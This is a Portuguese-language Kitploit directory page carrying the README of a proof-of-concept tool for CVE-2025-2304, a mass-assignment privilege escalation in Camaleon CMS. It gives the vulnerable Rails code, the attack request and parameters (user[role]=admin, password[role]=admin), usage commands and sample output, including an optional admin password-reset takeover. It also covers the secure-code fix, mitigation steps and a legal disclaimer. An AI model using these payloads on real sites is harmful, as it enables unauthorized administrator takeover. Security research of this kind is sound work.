Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-2304-POC — Prova de conceito para CVE-2025-2304 — crítica (CVSS 9.4) escalada de privilégios mass-assignment no Camaleon CMS. | Kitploit
Ferramentas/GitHubGitHub/d3vn0mi/cve-2025-2304-poc
Escalada de PrivilégiosGeração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubd3vn0mi/cve-2025-2304-poc

CVE-2025-2304-POC

Prova de conceito para CVE-2025-2304 — crítica (CVSS 9.4) escalada de privilégios mass-assignment no Camaleon CMS.

Ver Repositório
103há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-2304 PoC - Escalação de Privilégios no Camaleon CMS

CVE CVSS Python License

Uma Prova de Conceito (PoC) para CVE-2025-2304, uma vulnerabilidade crítica de atribuição em massa no Camaleon CMS que permite a escalação de privilégios de utilizadores com baixos privilégios para administradores.

root@kitploit:~
    ██████╗ ██████╗ ██╗   ██╗███╗   ██╗ ██████╗ ███╗   ███╗██╗
    ██╔══██╗╚════██╗██║   ██║████╗  ██║██╔═████╗████╗ ████║██║
    ██║  ██║ █████╔╝██║   ██║██╔██╗ ██║██║██╔██║██╔████╔██║██║
    ██║  ██║ ╚═══██╗╚██╗ ██╔╝██║╚██╗██║████╔╝██║██║╚██╔╝██║██║
    ██████╔╝██████╔╝ ╚████╔╝ ██║ ╚████║╚██████╔╝██║ ╚═╝ ██║██║
    ╚═════╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚═╝

📋 Índice

  • Visão Geral
  • Detalhes da Vulnerabilidade
  • Funcionalidades
  • Instalação
  • Uso
  • Exemplos
  • Versões Afetadas
  • Mitigação
  • Aviso Legal
  • Referências
  • Autor

🔍 Visão Geral

CVE-2025-2304 é uma vulnerabilidade crítica de atribuição em massa no Camaleon CMS que existe no método updated_ajax do UsersController. A vulnerabilidade decorre do uso do perigoso método permit! no Rails, que permite que todos os parâmetros passem sem qualquer filtragem.

Este PoC demonstra como um utilizador autenticado com privilégios baixos pode escalar para administrador ao injetar parâmetros não autorizados durante operações de alteração de senha.

Pontuação CVSS: 9.4 (Crítico)

🐛 Detalhes da Vulnerabilidade

Causa Raiz

O código vulnerável usa params.require(:user).permit! que aceita todos os parâmetros fornecidos pelo utilizador sem validação:

root@kitploit:~
def updated_ajax
  user_params = params.require(:user).permit!  # DANGEROUS!
  current_user.update(user_params)
end

Exploração

Um atacante pode injetar parâmetros adicionais como user[role]=admin juntamente com campos legítimos de alteração de senha, fazendo com que a aplicação atualize a função do utilizador para administrador.

Vetor de Ataque:

  1. Autenticar-se como um utilizador com privilégios baixos (ex.: função "cliente")
  2. Enviar pedido POST manipulado para /admin/users/{id}/updated_ajax
  3. Injetar o parâmetro user[role]=admin
  4. A função do utilizador é elevada para administrador

✨ Funcionalidades

  • ✅ Teste Seguro: Preserva a senha do utilizador durante a exploração
  • ✅ Múltiplos Payloads: Testa mais de 7 técnicas de injeção diferentes
  • ✅ Detecção de Versão: Detecta automaticamente versões vulneráveis do CMS
  • ✅ Opção Não Destrutiva: flag --no-password-field para teste mais seguro
  • ✅ Suporte a Proxy: Integra-se com Burp Suite/ZAP para análise manual
  • ✅ Modo Verboso: Saída detalhada para depuração
  • ✅ Assunção de Admin: Ataque opcional de redefinição de senha do admin
  • ✅ Saída Codificada por Cores: Indicadores visuais claros para sucesso/fracasso

📦 Instalação

Requisitos

  • Python 3.7+
  • pip (gerenciador de pacotes Python)

Clonar Repositório

root@kitploit:~
git clone https://github.com/d3vhthnnni/cve-2025-2304-poc.git
cd cve-2025-2304-poc

Instalar Dependências

root@kitploit:~
pip install -r requirements.txt

Ou instalar manualmente:

root@kitploit:~
pip install requests beautifulsoup4

🚀 Uso

Sintaxe Básica

root@kitploit:~
python3 cve-2025-2304-poc.py <target_url> -u <username> -p <password> [options]

Opções da Linha de Comando

root@kitploit:~
argumentos posicionais:
  target                URL alvo (ex.: http://target.com)

argumentos obrigatórios:
  -u, --username        Nome de utilizador existente para autenticação
  -p, --password        Senha do utilizador

argumentos opcionais:
  -h, --help            Mostrar mensagem de ajuda e sair
  -v, --verbose         Saída detalhada (mostrar todos os pedidos)
  --proxy PROXY         Proxy HTTP para inspeção de tráfego (ex.: http://127.0.0.1:8080)
  --no-password-field   Testar exploração sem campos de senha (mais seguro)
  --skip-admin-test     Pular teste destrutivo de redefinição de senha de admin

📚 Exemplos

Teste Padrão (Recomendado)

Testar com credenciais de utilizador existentes, preservando a senha:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123

Teste Mais Seguro (Sem Campos de Senha)

Testar sem incluir campos de senha no payload de exploração:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --no-password-field

Com Proxy do Burp Suite

Roteie o tráfego pelo Burp Suite para inspeção manual:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --proxy http://127.0.0.1:8080

Modo Verboso

Ative a saída detalhada mostrando todos os pedidos e respostas:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 -v

Pular Testes Destrutivos

Teste apenas a escalação de privilégios, pule a redefinição de senha do admin:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --skip-admin-test

📊 Sample Output

root@kitploit:~
    ██████╗ ██████╗ ██╗   ██╗███╗   ██╗ ██████╗ ███╗   ███╗██╗
    ██╔══██╗╚════██╗██║   ██║████╗  ██║██╔═████╗████╗ ████║██║
    ██║  ██║ █████╔╝██║   ██║██╔██╗ ██║██║██╔██║██╔████╔██║██║
    ██║  ██║ ╚═══██╗╚██╗ ██╔╝██║╚██╗██║████╔╝██║██║╚██╔╝██║██║
    ██████╔╝██████╔╝ ╚████╔╝ ██║ ╚████║╚██████╔╝██║ ╚═╝ ██║██║
    ╚═════╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚═╝

============================================================
   CVE-2025-2304 - Camaleon CMS Privilege Escalation PoC
   Mass Assignment Vulnerability Tester
   Author: d3vn0mi | GitHub: github.com/d3vhthnnni
============================================================

[*] Target: http://target.com
[*] Username: testuser
[*] Password: **********

[*] Logging in as testuser...
[+] Successfully logged in

[*] Checking CMS version...
[*] Detected version: 2.9.0
[+] Version is VULNERABLE (< 2.9.1)

============================================================
[*] Testing CVE-2025-2304 Mass Assignment Vulnerability
============================================================

[*] Target User: testuser (ID: 7)
[*] Current Role: Client (client)
[*] Password will remain unchanged

[1/7] Testing: AJAX endpoint - user[role]
    ✗ Failed
[2/7] Testing: AJAX endpoint - password[role]
============================================================
[+] EXPLOITATION SUCCESSFUL!
============================================================
[+] Privilege Escalation: Client → Administrator
[+] Vulnerable Endpoint: /admin/users/7/updated_ajax
[+] Working Payload: {'password[role]': 'admin'}
[+] Password Unchanged: User can still login normally
[+] CVE-2025-2304 CONFIRMED!

[✓] CVE-2025-2304 VULNERABILITY CONFIRMED

🎯 Versões Afetadas

VersãoStatus
< 2.9.1❌ Vulnerável
≥ 2.9.1✅ Corrigido

Especificamente vulneráveis:

  • Camaleon CMS 2.9.0
  • Camaleon CMS 2.8.x e anteriores

🛡️ Mitigação

Ações Imediatas

  1. Atualizar para a versão 2.9.1 ou superior

    root@kitploit:~
    gem update camaleon_cms
    
  2. Auditar Contas de Utilizador

    • Verificar alterações inesperadas de privilégios
    • Revisar logs de modificação de funções de utilizador
    • Procurar pedidos POST suspeitos para /users/*/updated_ajax
  3. Forçar Redefinição de Senhas (se comprometido)

    • Redefinir senhas para todas as contas com privilégios
    • Invalidar sessões existentes

Prevenção a Longo Prazo

Padrão de Código Seguro:

Substituir o perigoso permit! por uma lista de permissões explícita:

root@kitploit:~
# Antes (VULNERÁVEL)
def updated_ajax
  user_params = params.require(:user).permit!
  current_user.update(user_params)
end

# Depois (SEGURO)
def updated_ajax
  user_params = params.require(:user).permit(:password, :password_confirmation)
  current_user.update(user_params)
end

Medidas de Segurança Adicionais:

  • Implementar filtragem forte de parâmetros em toda a aplicação
  • Adicionar fluxos de aprovação de mudança de função para operações críticas
  • Ativar registo de auditoria para alterações de privilégios
  • Usar princípio do menor privilégio
  • Monitorar tentativas de atribuição em massa através de regras de WAF

⚠️ Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de teste de segurança autorizados.

Aviso Legal:

  • Use esta ferramenta apenas em sistemas que possui ou para os quais tenha permissão explícita por escrito para testar
  • O acesso não autorizado a sistemas informáticos é ilegal sob leis como:
    • Computer Fraud and Abuse Act (CFAA) nos Estados Unidos
    • Computer Misuse Act 1990 no Reino Unido
    • Legislação semelhante em outras jurisdições
  • O autor não assume NENHUMA responsabilidade por uso indevido ou danos causados por esta ferramenta
  • Os utilizadores são os únicos responsáveis pelas suas ações

Uso Ético:

  • Obter autorização adequada antes de testar
  • Seguir práticas de divulgação responsável
  • Usar em compromissos de teste de penetração com aprovação de escopo
  • Apenas para fins educacionais em ambientes de laboratório controlados

📖 Referências

  • Entrada CVE: CVE-2025-2304
  • Aviso GHSA: GHSA-rp28-mvq3-wf8j
  • Aviso do Fornecedor: Tenable Security Research TRA-2025-09
  • Commit de Correção: GitHub Commit 179fd6b
  • Notas de Lançamento: Camaleon CMS 2.9.1

👤 Autor

d3vn0mi

  • GitHub: @d3vn0mi
  • Site pessoal: @d3vn0mi
  • Blog pessoal: @d3vn0mi

📝 Licença

Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.

🤝 Contribuindo

Contribuições, problemas e pedidos de funcionalidades são bem-vindos!

Sinta-se à vontade para verificar a página de issues.

⭐ Mostre Seu Apoio

Dê uma ⭐️ se este projeto te ajudou!


Nota: Este repositório é para fins de pesquisa de segurança e educacionais. Sempre pratique divulgação responsável e obtenha autorização adequada antes de testar.

Baixar ferramenta